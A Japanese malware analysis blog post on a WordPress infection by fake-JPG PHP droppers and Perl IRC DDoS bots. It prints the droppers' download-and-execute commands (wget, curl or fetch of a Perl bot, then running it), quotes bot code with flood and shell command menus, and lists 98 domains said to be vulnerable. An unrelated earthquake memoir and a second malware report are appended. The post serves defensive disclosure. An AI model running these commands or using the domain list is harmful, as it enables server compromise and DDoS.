DetectionRatio:  1 / 42
Analysis Date:   2012-02-25 15:23:03 UTC
Analysis Result: [CLICK]

↑上記は下記のマルウェアです↓
アファイル　　：「pani1.jpg」「pani2.jpg」
マルウェア種類： トロイ・UNIX経由のPHPドロッパーとバックドア
マルウェア名　： PHP/Trojan Dropper/Downloader/Copier
マルウェア機能： リモートから実行される事、ダウンロードされたマルウェアを実行されます
説明　　　　　： 本マルウェアは脆弱でインジェクトされたニセJPGファイル、
                 HTTPでリモート実行実行されたらマルウェアファイルをダウンロードされて、
                 ダウンロードされたマルウェアをPerlで実行し削除されました。
ファイルの形は:
上記のトロイを実行されたら下記のマルウェアがダウンロードされます↓
File name:       nyamuk.txt
File size:       52.2 KB ( 53447 bytes )
MD5:           03465ffba9ff05baab7ba3627b12c5d7
File type:   looks: Text File, actual: Perl Script
Detection ratio: 12 / 42
Analysis date:   2012-02-25 16:06:19 UTC
Analysis Result: [CLICK]

↑マルウェアの種類は↓
アファイル　　：「nyamuk.txt」
マルウェア種類： トロイ・Perl/IRC-BOT・攻撃ツール + バックドア
マルウェア名　： Perl/Trojan.IRC-BOT IRC-FLooder/Backdoor
マルウェア機能： リモート実行あれる事、IRCサーバへ攻撃する事
説明　　　　　： 本マルウェアを実行されたらIRCチャンネルにFloodメッセージ攻撃を送信されます

File name:   unix.txt
File size:   58.2 KB ( 59589 bytes )
MD5:             6ccd2c5fb978ac8065fcf550cd306c0f
File type:   looks: Text File, actual: Perl Script
Detection ratio: 26 / 43
Analysis date:   2012-02-25 16:07:22 UTC
Analysis Result: [CLICK]

アファイル　　：「unix.txt」
マルウェア種類： トロイ・Perl/IRC-BOT・攻撃ツール + バックドア
マルウェア名　： Perl/Trojan.IRC-BOT IRC-FLooder/Backdoor/Shell
マルウェア機能： ・リモートから実行される事、
                 ・IRCサーバ経由ネットワーク攻撃機能が持っています
説明　　　　　： 本マルウェアを実行されたらIRC経由でDDoS攻撃/PortScan/感染動き
                 バックドア機能はIRCポートとメール送信機能

「unix.txt」と「nyamuk.txt」ファイルの形は:

■マルウェアの感染仕組み↓
感染されたサーバの原因は下記のWordpress脆弱性があるはず（どっちか）↓
CVE-2012-1205 Relocate Upload plugin flaw : PHP remote file inclusion
CVE-2012-1011 AllWebMenus plugin flaw     : HTTP_REFERER value injection
CVE-2012-1010 AllWebMenus plugin flaw     : Execute arbitrary code
CVE-2011-5051 WP Symposium plugin         : XSS insecure PHP input handle
CVE-2011-3841 WP Symposium plugin         : XSS insecure PHP input handle
CVE-2011-3129 On hosts with dangerous security setting flaw 
※本問題に影響されたらリモートからJPGファイルがインジェクトされます。
　WordpressにあるPHPのインプットハンドルのバグを使われてXSSで攻撃されただろうと。
　詳しくはサーバにある2月7日のアクセスログに攻撃元の情報が残っているはずです。

それで、感染されたサーバがリモートから実行される問題があります、
原因はWordpressのthemeリモート実行脆弱性ですね、下記のどっちか↓
CVE-2011-3863, CVE-2011-3862, CVE-2011-3861
CVE-2011-3860, CVE-2011-3858, CVE-2011-3857
CVE-2011-3856, CVE-2011-3855, CVE-2011-3854
CVE-2011-3853, CVE-2011-3852, CVE-2011-3851
CVE-2011-3850
※上記の問題は全てWordpressのthemeダイレクトリー権限の脆弱性ですね。
  影響されたらリモートからサーバのthemeパスにのコマンドを実行される事が出来ます。
  本来はwget/curl/lynx/rmのコマンドがリモートから実行されたそうです、証拠は
  nyamuk.txtとunix,txtが保存されましたね。
　詳しくはサーバにある2月7日のアクセスログを見て下さい

■マルウェアの説明↓
感染仕組みのイメージはこんな感じのイラストレーション↓


本マルウェアの感染仕組みですが、私が見た限りIRC-BOTのインストールツールが使われているそうです。
ツールの仕組みは大体こんな感じですね↓
まずはWordpressの脆弱性を確認してからそのツールが実行されるかと思われます。
本件の感染されたサーバを見たらWordpressとWPのthemeがインストールされてます↓

↑これが普通にwebcrawlingで分かりますね。

それでWordpressのバーションを確認したら下記脆弱情報を使って画像ファイルをアップロードされます↓
CVE-2012-1205, CVE-2012-1011, CVE-2012-1010, 
CVE-2011-5051, CVE-2011-3841, CVE-2011-3129
↑詳しい脆弱性情報を確認したいなら上記のCVEをクリックして下さい。

一回画像ファイルアップロード脆弱性があると確認されたら、PHPやWPがファイル名しか確認しないので、
ニセ画像ファイルの名前でテキストファイルもアップロードされます。
それでアップロードした時にちゃんと実行権限を設定されたらマルウェアがリモートから実行される状況になる↓

そして他のマルウェアファイルをアップロードされます。とのツール仕組みです。

それでこの４つのファイルは何の為にあるかと、説明します。
pani1は他のサーバに感染させるようなマルウェアです。
ロジックは下記のようにになります、このままのマルウェアPHPコードです↓
@passthru('cd /tmp;wget http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf  ips1.txt');
@passthru('cd /tmp;curl -O http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf  ips1.txt');
@passthru('cd /tmp;lwp-download http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf  ips1.txt');
@passthru('cd /tmp;lynx -source http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf  ips1.txt');
@passthru('cd /tmp;fetch http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf  ips1.txt');
@passthru('cd /tmp;GET http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf  ips1.txt');
@passthru('cd /var/tmp;wget http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf  ips1.txt');
@passthru('cd /var/tmp;curl -O http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf  ips1.txt');
@passthru('cd /var/tmp;lwp-download http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf  ips1.txt');
@passthru('cd /var/tmp;fetch http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf  ips1.txt');
@passthru('cd /var/tmp;GET http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf  ips1.txt');
@system('cd /tmp;wget http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf  ips1.txt');
@system('cd /tmp;curl -O http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf  ips1.txt');
@system('cd /tmp;lwp-download http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf  ips1.txt');
@system('cd /tmp;lynx -source http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf  ips1.txt');
@system('cd /tmp;fetch http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf  ips1.txt');
@system('cd /tmp;GET http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf  ips1.txt');
@system('cd /var/tmp;wget http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf  ips1.txt');
@system('cd /var/tmp;curl -O http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf  ips1.txt');
@system('cd /var/tmp;lwp-download http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf  ips1.txt');
@system('cd /var/tmp;fetch http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf  ips1.txt');
@system('cd /var/tmp;GET http://xxxx/nyamuk.txt;perl nyamuk.txt;rm -rf  ips1.txt');
↑見たようにnyamuk.txtのマルウェアを/tmpにダウンロードして、システムにコピーするです。
さらに/tmpに保存されたnyamuk.txtを削除されますね。
づアンロードの為に色んなUNIXコマンドを使われてますねwget, curl,lwp-download,lynx fetch,GETとか

詰り、PHPリモート実行脆弱性があるマシンで本件マルウェア感染されたマシンのpani1.jpgを実行したら、
nyamuk.txtのPerlマルウェアがダウンロードされるとの目的です。

同じ様にpani2ファイルは下記のロジックです↓
@passthru('cd /tmp;wget xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*');
@passthru('cd /tmp;curl -O xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*');
@passthru('cd /tmp;lwp-download xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*');
@passthru('cd /tmp;lynx -source xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*');
@passthru('cd /tmp;fetch xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*');
@passthru('cd /tmp;GET xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*');
@passthru('cd /var/tmp;wget xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*');
@passthru('cd /var/tmp;curl -O xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*');
@passthru('cd /var/tmp;lwp-download xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*');
@passthru('cd /var/tmp;fetch xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*');
@passthru('cd /var/tmp;GET xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*');
@system('cd /tmp;wget xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*');
@system('cd /tmp;curl -O xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*');
@system('cd /tmp;lwp-download xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*');
@system('cd /tmp;lynx -source xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*');
@system('cd /tmp;fetch xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*');
@system('cd /tmp;GET xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*');
@system('cd /var/tmp;wget xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*');
@system('cd /var/tmp;curl -O xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*');
@system('cd /var/tmp;lwp-download xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*');
@system('cd /var/tmp;fetch xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*');
@system('cd /var/tmp;GET xxxx/unix.txt;perl unix.txt;rm -rf unix.txt*');
↑pani2はunix.txtのPerlマルウェアを感染させるようなPHPマルウェアです。

pani1とpani2は何故か実行が可能になったかと下記のWordpressのthemeの影響があります↓
CVE-2011-3863, CVE-2011-3862, CVE-2011-3861
CVE-2011-3860, CVE-2011-3858, CVE-2011-3857
CVE-2011-3856, CVE-2011-3855, CVE-2011-3854
CVE-2011-3853, CVE-2011-3852, CVE-2011-3851
CVE-2011-3850
nyamuk.txtマルウェア説明↓
次はnyamuk.txtはどんなマルウェアでしょうか？簡単な説明をさせて頂きます…

ヘッタには下記のスナップショットコードです↓
#!/usr/bin/perl
#   PENGATURAN
##########################################
my $server   = "multiplay.uk.quakenet.org";
my $port     = "6667";
my $channel  = "#marxone";
↑これだけ見たらPerl経由IRC BOTです、が…
インターフェースの情報をゲット↓
my @ips1 =qx(/sbin/ifconfig |grep \"inet addr\:\" \|awk \-F \' \' \'\{\print \$2\} \' \| cut \-c6\-);
my @ips2 =qx(/sbin/ifconfig \-a |grep \"inet end\.\:\" \|awk \-F \' \' \'\{\print \$3\} \');
my @fbsd =qx(/sbin/ifconfig \|grep \"inet\" \|awk \-F \' \' \'\{\print \$2\} \' \| cut \-c1\-);
@ips = (@ips1, @ips2, @fbsd);
base64暗号されたIRCユーザを発見↓
$string1 = "ZGFya2x5";　←"darkly"
$string2 = "Y0t6";      ←"cKz"
$string3 = "cGFuYQ==";  ←"pana"
$string4 = "RnVzaW9u";  ←"Fusion"
$string5 = "SXowbg==";  ←"Iz0n"
攻撃メニュー↓
print $sock "PRIVMSG ".$owner." : ================================\n";
print $sock "PRIVMSG ".$owner." : + LinkIRC\n";
print $sock "PRIVMSG ".$owner." : + pani\n";
print $sock "PRIVMSG ".$owner." : + LinkIRC\n";
print $sock "PRIVMSG ".$owner." : ================================\n";
print $sock "PRIVMSG ".$owner." :  - perintah:\n";
print $sock "PRIVMSG ".$owner." : !tembak nick pesan (msgflood)\n";
Flood/DDoSコマンド（Dccなど)↓
if(/^\:$owner!.*\@.*PRIVMSG.*:!dccflood(.*)/){
for (1 .. 10) {
print $sock "PRIVMSG ".$mescalina." :\001DCC CHAT chat 1121485131 1024\001\n";

if(/^\:$owner!.*\@.*PRIVMSG.*:!notis (.*)/){
my $musuh = $1;
print $sock "NOTICE ".$musuh." :
MAMMMMMMMMMMPPPPPPPUUUUUUUUUUUSSSSSSSSSSSSS LLLLLLLLLLLOOOOOOOOOO FUCK MOTHER FUCKER\n";
では、nyamuk.txtはIRC Floof/DDoS攻撃ツールのマルウェアですね。
コードのベースはスペイン語コメントが沢山書いてありますが、
インドネシア語のメッセージが上書きされています。
本マルウェアに感染されたサーバに2月7日のログで検索するとインドネシアのASN/IPが出たらば、
それは犯人ですよ。
unix.txtのマルウェア説明↓
このマルウェアは完全にIRCボット＋攻撃ツールですね。
下記はいくつコードのスナップショット...

ヘッターはこんな感じで、見た目はPerlのIRC-BOTです↓
#######################################################
## Perl Shell at mIRC Control                        ##
## By TuX_Sh4D0W                                     ##
## Released : 11 November 2008                       ##
## --------------------------------------------------##
##.---..-..-..-.,-..-..-..-.   .---..---..---..----. ##
##'| |'| || || . < | || || |__ | |-  \ \ '| |'| || | ##
## '-' '----''-''-''----''----''---''---' '-' '----' ##
##-------------------------------------------------- ##
#######################################################
#!/usr/bin/perl
######################
my $processo = '/usr/sbin/r00t';
my $linas_max='8';
UNIXサーバIRCシステムを狙ってますね↓
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
こちらもインドネシアのサインを発見（＾＾
##################################
#        DONATE US         #
##################################
# http://www.indonesiancoder.com #
#########################
攻撃メニュー↓
sendraw($IRC_cur_socket, "PRIVMSG $printl : ( 4+ Help 4+ ) !hack  7@ ddos");
sendraw($IRC_cur_socket, "PRIVMSG $printl : ( 4+ Help 4+ ) !hack  7@ scanscan");
sendraw($IRC_cur_socket, "PRIVMSG $printl : ( 4+ Help 4+ ) !hack  7@ backconnect");
sendraw($IRC_cur_socket, "PRIVMSG $printl : ( 4+ Help 4+ ) !hack  7@ shell");
sendraw($IRC_cur_socket, "PRIVMSG $printl : ( 4+ Help 4+ ) !hack  7@ portscanner");
専用DDoS攻撃メニュー↓
"PRIVMSG $printl : ( 4+ Help 4+ ) There are 3 DDossers in this bot");
"PRIVMSG $printl : ( 4+ Help 4+ ) UDPFlood, HTTPFlood and TCPFlood");
"PRIVMSG $printl : ( 4+ Help 4+ ) !hack  7@ udpflood   ");
"PRIVMSG $printl : ( 4+ Help 4+ ) !hack  7@ tcpflood    ");
"PRIVMSG $printl : ( 4+ Help 4+ ) !hack  7@ httpflood  ");
その他のハッキング機能↓
!hack  7@ portscan ");
!hack  7@ nmap   ");
!hack  7@ back ");
!hack  cd tmp  12 for example");
!hack  7@ udpflood   ");
!hack  7@ tcpflood    
!hack  7@ httpflood  ");
!hack  7@ linuxhelp");
!hack  7@ spread ");
!hack  7@ scan  ");
!hack  7@ system");
!hack  7@ logcleaner");
!hack  7@ sendmail     
■感染されたサービスの情報（連絡先など）
[Domain Name]                   GUTCHI.JP
[Registrant]                    BET.Inc
[Name Server]                   dns01.gmoserver.jp
[Name Server]                   dns02.gmoserver.jp
[Created on]                    2007/06/20
[Expires on]                    2012/06/30
[Status]                        Active
[Last Updated]                  2012/01/25 18:38:08 (JST)

Contact Information:
[Name]                          BET, Inc.
[Email]                         info@bet.co.jp
[Web Page]                       
[Postal code]                   530-0012
[Postal Address]                Osaka
                                1-14-8 shibata,kita-ku,osaka-city,Osaka
                                Umedakita Place 12F
[Phone]                         06-6292-8811
[Fax]                           06-6292-8812


a. [Network Number]             210.157.0.0/20
b. [Network Name]               INTERQ
g. [Organization]               Global Media Online inc.
m. [Administrative Contact]     TW184JP
n. [Technical Contact]          TW184JP
p. [Nameserver]                 ***LAME***_dns.interq.or.jp_2011-12-01
p. [Nameserver]                 ***LAME***_dns1.interq.or.jp_2011-12-01
[Remarks]                       The nameserver marked as ***LAME*** is not
[Remarks]                       properly configured.
[Assigned Date]                 1997/05/28                 
[Last Update]                   2008/07/29 14:05:05(JST)

a. [JPNICハンドル]              TW184JP
b. [氏名]                       割田 太郎
c. [Last, First]                Warita, Taro
d. [電子メイル]                 warita@gmo.jp
f. [組織名]                     GMOインターネット株式会社
g. [Organization]               GMO Internet,Inc
k. [部署]                       システム本部ネットワークチーム
l. [Division]                   System Department,Network Team
m. [肩書]                       リーダ
n. [Title]                      Leader
o. [電話番号]                   03-5456-2555
p. [FAX番号]                    03-5456-2687
y. [通知アドレス]               network-team@gmo.jp
[最終更新]                      2007/05/28 11:32:32(JST)
                                db-staff@nic.ad.jp
■インターネットルーティング図
ASNルート↓

IP対ドメイン情報↓

↑ここで見たら、同じホスティングサーバのIPに色んなWordpressサービスのお客様が居ます。
他のユーザにも同じ脆弱性が持っているので（確認しました！）、同じマルウェアに感染される可能性が高いです。
本件にはBET社とGMO社にご注意をお願いしたいと思っております。

上記の情報を洗い出したら恐らく98件の日本のドメインには同じ脆弱性があるかと分かりました↓
11111.jp
1571.jp 
21j.com 
99999.jp 
a-llure.cx 
a-takane.biz 
abe-d.com 
active-dream.jp 
afia.jp 
anom.jp 
aoruk.com 
at-china.jp 
beatec.net 
boogiewoogiecafe.com 
brideslife.com 
clubrinea.com 
coral-islands.com 
cosmopk.com 
csk.vc 
ctic.jp 
cues-ad.co.jp 
dom.com 
driver.novac.co.jp 
drnet.jp 
e-works.vc 
earth-wind.net 
elan.co.jp 
f-toshi.com 
faceo.co.jp 
gongwell.com 
gr0.net 
hpv.jp 
hyogo-cals.org 
i-plus.co.jp 
ida-web.co.jp 
ihj.jp 
incuvalue.com 
izumimachi.net 
jardinsdesfleurs.com 
jenne-vbm.com 
jhowardtrading.com 
jpdgafukuoka.com 
kabu.cc 
kamojiru.com 
karhosting.com 
kashikin.info 
katuyama.com 
keizuconcord.com 
krei-bel.com 
ku-kaisers.com 
kumapooh.jp 
kyoto-town.tv 
mediac.com 
na-arts.jp 
nextlayer.jp 
nr-a.com 
onkodo.com 
oyadokayu.com 
p-cube.jp 
p-maps.co.jp 
picnet.jp 
prmc.co.jp 
saitogakkikoubou.com 
saiwai-law.com 
sayadoll.com 
seniorcosmos.co.jp 
shimagaku-h.ed.jp 
shinowazuri.com 
sinhp.jp 
sophia3.com 
splendid.jp 
spyle.com 
stinx.net 
tammy-inv.co.jp 
tansan.co.jp 
test119.com 
uekusa-tri.co.jp 
v-max.co.jp 
videomanial.co.jp 
weddingatgreenes.com 
wise-academy.net 
wonder9.com 
www.csk.vc 
www.elan.co.jp 
www.katuyama.com 
www.kazuhide.biz 
www.keizuconcord.com 
www.lejeudelassiette.com 
www.shantiitown.com 
www.uekusa-tri.co.jp 
www.videomanial.co.jp 
www.wise-academy.net 
wyvern.jp 
xn--pqqy41ezej.com 
yahashira.com 
yatong-textiles.com 
yuriozaki.com 
yyadachi.com 
■マルウェア削除依頼の連絡を送りました↓


以上

----
ゼロデイ・ジャパン
http://0day.jp
マルウェア研究所
アドリアン・ヘンドリック
Sponsored by: 株式会社ケイエルジェイテック
Tweet

A year memoir of Fukushima 3-11 eathquake | A geek's diary

It has been almost one year from 3-11 Quake and Tsunami disaster in Fukushima. I was there, I saw and remembered it well. Yesterday I was attending Defcon Japan meeting and talk about this with the guy sat next to me. He urged me to write it, and this is it, I dedicate this writing to all 3-11 quake victims and to fellow IT/security engineers everywhere to let you know the actual feeling of what had happened on-the-site.

I was working in the Fukushima xxxx network for trouble shooting a a network packet filtration, when earthquake started on March 11th last year. When it was started 6(six) of us was inside of the secure data center. I remember that I was analyzing a weird SYN/ACK packets sent and received between proxy layer and core switch in within, so I was standing in the front of one 7feet high server's rack analyzing and a monitor console for the captured network packets. The server's racks in the room itself contains of 3 blocks of 20U (has big gaps within U's)racks of 10feet long. Shortly, when it hit us there, it was happening so fast but every glimpse of what I saw was perfectly recorded in my brain like sequences of a slow motion "flashback" movie, that often plays over and over in some of my nightmare until now, so yes, I think I can pretty much tell you the exact details. Now, a year had passed after the disaster, there were nights to woke up with the nightmare with seeing these visions and this is the first time ever I finally dare to write it.

When it was started, it was just like the previous smaller quakes previously happened during the period, it was started with the horizontal movement and slowly followed by the strange deep grunt voice of "Boom, boom, boom..!" coming from the center of the earth, then it went faster.. The vertical rocks then started to merge with the horizontal movement. I stopped my work, exit the shell right away, slam down the console and looked up. We were all stunned from our posts since we had 2 more groups separated in the network consoles and tables. We looked at each others for at least in the first 10secs, afterward one of us said "This one is getting harder and harder isn't it?", and that was the word that triggering our first action. About 20Us size server's racks (around 7ft height) was started to rock so hard, and every edge of racks bumped to its space limit safety block (actually it was dig and made with slack of 1 meter size for the quake precaution) with the loud voice, when the bumping on each hit got so hard, the balls inside of the rack's conjunctions was popped out and fly like a bullets. Some smaller server's, routers, switch's part was starting to fall (or FLY will be more like it..). I assure you there is no loose parts in that data center but the hit was so hard so it can throw stuff that was not tightly screwed. The situation is getting into a chaotic scene, still, at that time most of us were trying to save the service first. I saw four of the engineers run and hold the rack by their both hands while others were doing some shutdown procedure.

In a short moment after, I didn't recall how much seconds or minutes, the quake was started to rock us with a hoopla-like movement that so strong so I felt that I was going to die right there. I made decision, to yell out loud to others to leave/forget the racks & to just run out of the data center room and out of the building a.s.a.p; can't remember much; but I was saying those with grabbing my stuff and two engineers and pull them all to the exit door.

At that time the call coming to my mobile from Tokyo and I was reported the same condition (around 3secs established call then it disconnected), well, later on I knew that when the caller heard my yell to other fellow engineers in the data center by phone, my yelling made the callers running out of the building too, good for them. Meanwhile inside the data center the electricity was starting to go off. This causing us cannot get out of the room for the security authentication card cannot be read due to power off (surprisingly the backup generator was NOT running), Jammed at the door, I took a glimpse and heard sounds from some server's consoles that were still running by the UPS to hold the services for the shutdown procedure of important network devices. And that time was when the mobile service of the earthquake alert sounds started to "buzz" (those alert were a way too slow, meant nothing to us at that moment...), I was starting to wonder what would happen next if we don't hurry to get out that room..That was the point where we started to be panic, and when you panic on such situation, trust me, it will rush into your head and override your common-sense..

Finally using the manual procedure the door was managed to be opened up and we started to just run out of the IDC door to the hall, we ran like hell to the building's exit door, at that time the building was rocked so hard so we kept on running and managed not to fall at the same time. Myself and 5 of us was successfully went out of the exit door, when one engineer went back to the IDC to get a battery, and I went back in to chase him back there and held the IDC door for him (I don't know why I chased him back in.. I guessed maybe it was better to have 2 persons back in a room than one..)

He took what he needed and we managed to fly off the exit door (again!) and at the time the concrete blocks of the building was starting to fall to the parking lot and exit door's nearby.. Those were a big blocks made of concrete, if one of it hits my head I will surely K.O., I guess. So we were very very lucky.

The first sight I saw after stepping out of the building was a rather big concrete blocks falls all over near by the exit door, I saw some cars parked near to building was already wrecked by those fallen concrete bricks in the parking area and right in front of us there was a slim 5th floor building was rocked side-to-side until (more or less) almost 25degree each.. seriously, I was amazed watching that building was not falling at that point.. that building was throwing its antennas and etc parts from its roof like rockets in its some swings. That time, it was the first time that I realized that I carried my bag, I put it somewhere in the parking lot space and a car was moved on its own by the quake and one of the tire was (literally) on my bag..but I didn't even remember when was the time I grabbed it. We were gathered there until 15:40 at that time, before I decided to go to Fukushima station, to find a way back home. The worst part of all is the news, the tsunami news can be viewed by the TV inside of the cars.., we were thinking of the end of the world that time..

One of the members was driving me half way to the station, which was a hard stuff since no traffic light works and many panic drivers thinking only their own priority, We only could drive halfway, I continued to go to biggest train station by foot and reach there to find about almost 200peoples standing in the front of the station building which cannot be entered since the quakes-echo still came like waves with the quite big scale (within 4 to 5 each in Japanese scale called "shindo").

To make our disaster perfect, the snow started to fall. I saw some office workers without the coat out there too. Can't use any mobile devices, no phone calls..I presumed all of the antennas went down. I dropped idea of phone access and tried my luck to check every internet connection I had...or I knew, after some rapid dial here and there found that one service's antenna connection can be used, yet there was a problem in resolving DNS (since the infra based connectivity was ruined), hurried putting some known public worldwide DNS IP in every resolve.conf of my devices, afterward I tried to check my house & office IP but got timed-out. So does the Tokyo IDC. At that time VoIP call came into my mind. After the 10th effort connecting to a server in United States, I finally got it. I was thinking to make connection alive as long as possible. I tried to make phone call to the hard lines, avoiding mobile ones, and successfully made some. Many people in there seeing me with amazed since they can not even call, so I was explaining put loud to use the Wifi to connect a specific service's antennas and VoIP service so they might made a call, and the ones with PCs started to tried it.

Meanwhile, my PC was connected to the internet and I can get the internet radio on, people started to gather. At that time the first nuclear plant explosion news came into our ears I guess. I was a kind of news center, and keep on doing that until my PC went out of battery (no power plug since all buildings blacked out). We were starting to freeze, it was snowing, afterward, police station nearby managed to get taxi drivers to pick them as passengers (5person in each taxi) and evacuate them from station to the nearest residence area (usually there were plenty of taxicabs in front of station but the quake made them runaway), while I was staying there & start arranging my way back home, which will be another long story that took me 3days to get back there..

The moral of this true story is; Number One, in disaster like this: human is first & machine is next! As an one of unix sysadmin we are pledged to make a service lasts as long as possible, maybe longer than human's lifetime, that was why in BSD we said Daemon to services. BUT, in a practical way, no human means no service. We should say over and over that saving a service is important yet is up the some certain condition of a disaster, when the condition goes near to live or death, just drop everything and run off. Damage will occur and so be it, because without your life the damage cannot be fixed. P.S.: If the service is involving lifeline level of a lot of people, maybe it will worth to die for, and that's is a different one. This priority will be hardly remembered during the disaster, so next tip is important..

Number two is, to train yourself to handle this kind of situation! We should pay more attention to the disaster simulation handling. No person who born with the gift for handling these pressure, to train yourself to act automatically in the disaster is a must! Which is not just a merely training but think & imagine it as real as possible. I am telling you, no brain can overcame fears caused by these panic & stress, and the cure of it is your rehearsal effort.

Number three, be resourceful in media connectivity, as much as possible in your daily life (internet, radio, TV, anything!). As engineer you SHOULD at least know that you can be connected to network as many way as possible. If you have a hand-phone make sure it has FM/Radio on it, if you have smart-phone be sure to have WiFi function on it, If you use Wifi, make sure you have some services to connect to & do not depend into one connectivity. If you have latest smart phone, make sure it can do tether on it. This diversification of connectivity know-how will be your weapon to survive in disaster. And don't forget your bag. You have many surviving tools in it, more than you know it, you might need it later.

---
Based on personal experience,
Twitter: @unixfreaxjp
*) all of the picture attached is to be viewed publicly in some media & all rights are copyrighted & reserved.

#OCJP-019： KDDIネットワークにある中国サーバ「huaidan.org / 106.187.42.180」にRemote Desktopスパイウェア発見！【対応済み】

■下記のホスト/IP↓
huaidan.org / 106.187.42.180
■下記のURL↓
hxxp://huaidan.org/wp-content/uploads/200708/clear3389.rar
■ファイル情報↓
clear3389.rarはRARアーカイブファイルです↓
File name:      clear3389.rar
File size:      12.7 KB ( 12986 bytes )
MD5:  　　　  9f9849ba2b9273c821caf8c29c9b5619
↑中身はマルウェア実行ファイルです↓
File name:      clear3389.exe
File size:      32.0 KB ( 32768 bytes )
MD5:            a695473047830e6071bc440dc6ab88c3
イメージ↓
■下記のマルウェアを発見しました↓
アファイル　　：「clear3389.exe」
マルウェア種類： トロイ・スパイウェア/バックドア
マルウェア名　： Win32/Trojan Genome/Click/HackTool
マルウェア機能： トロイ、バックドア、スパイウェア
説明　　　　　： 感染されたPCの情報がリモートから見まれます(Trojan/Spyware)
                 感染されたPCはリモートからコントロールが出来ます(Bot)
                 感染されたPCにバックドアポートが開けます(Backdoor)
■ダウンロード証拠↓
--00:54:41--  hxxp://huaidan.org/wp-content/uploads/200708/clear3389.rar
           => `clear3389.rar'
Resolving huaidan.org... 106.187.42.180
Connecting to huaidan.org|106.187.42.180|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12,986 (13K) [application/rar]
100%[====================================>] 12,986        --.--K/s
00:54:41 (810.17 KB/s) - `clear3389.rar' saved [12986/12986]
■ウイルススキャン結果↓
MD5:            9f9849ba2b9273c821caf8c29c9b5619
File size:      12.7 KB ( 12986 bytes )
File name:      clear3389.rar
File type:      unknown
DetectionRatio: 27 / 43
Analysis date:  2012-02-18 16:02:56 UTC
Resut:         [CLICK]

MD5:            a695473047830e6071bc440dc6ab88c3
File size:      32.0 KB ( 32768 bytes )
File name:      clear3389.exe
File type:      Win32 EXE
DetectionRatio: 30 / 43
Analysis date:  2012-02-18 16:57:44 UTC (
Resut1:         [CLICK]
Resut2:         [CLICK]
Resut3:         [CLICK]


-----------------------------------------------------------
現在のウイルススキャン結果/ウイルストータルより
-----------------------------------------------------------
AhnLab-V3  -  20120213
AntiVir  TR/Agent.DXD  20120213
Antiy-AVL  Virus/Win32.Xorer.gen  20120213
Avast  Win32:Trojan-gen  20120214
AVG  Generic13.AABU  20120213
BitDefender  Trojan.Generic.658878  20120214
ByteHero  -  20120216
CAT-QuickHeal  -  20120213
ClamAV  -  20120214
Commtouch  -  20120213
Comodo  UnclassifiedMalware  20120213
DrWeb  Trojan.Click.57896  20120214
Emsisoft  Trojan.Win32.Genome!IK  20120214
eSafe  Win32.TrojanHorse  20120213
eTrust-Vet  -  20120213
F-Prot  -  20120213
F-Secure  Trojan.Generic.658878  20120214
Fortinet  W32/Genome.FGS!tr  20120214
GData  Trojan.Generic.658878  20120214
Ikarus  Trojan.Win32.Genome  20120214
Jiangmin  Trojan/Genome.njp  20120213
K7AntiVirus  -  20120213
Kaspersky  Trojan.Win32.Genome.fgs  20120214
McAfee  Artemis!A69547304783  20120214
McAfee-GW-Edition  Artemis!A69547304783  20120213
Microsoft  -  20120213
NOD32  -  20120214
Norman  W32/Agent.NBIC  20120213
nProtect  Trojan.Generic.658878  20120213
Panda  -  20120213
PCTools  -  20120207
Prevx  -  20120218
Rising  Trojan.Win32.Generic.122B1984  20120213
Sophos  Mal/Generic-L  20120214
SUPERAntiSpyware  -  20120206
Symantec  Trojan Horse  20120214
TheHacker  -  20120213
TrendMicro  TROJ_GENOME.BL  20120213
TrendMicro-HouseCall  TROJ_GENOME.BL  20120214
VBA32  Trojan.Genome.fgs  20120213
VIPRE  Trojan.Win32.Generic!BT  20120214
ViRobot  -  20120213
VirusBuster  Trojan.Genome!UPks0Fju5xA  20120213
■マルウェア調査結果↓
バイナリ調査↓
1. CRC Check Fail: Claimed:  0 Actual:  77,052
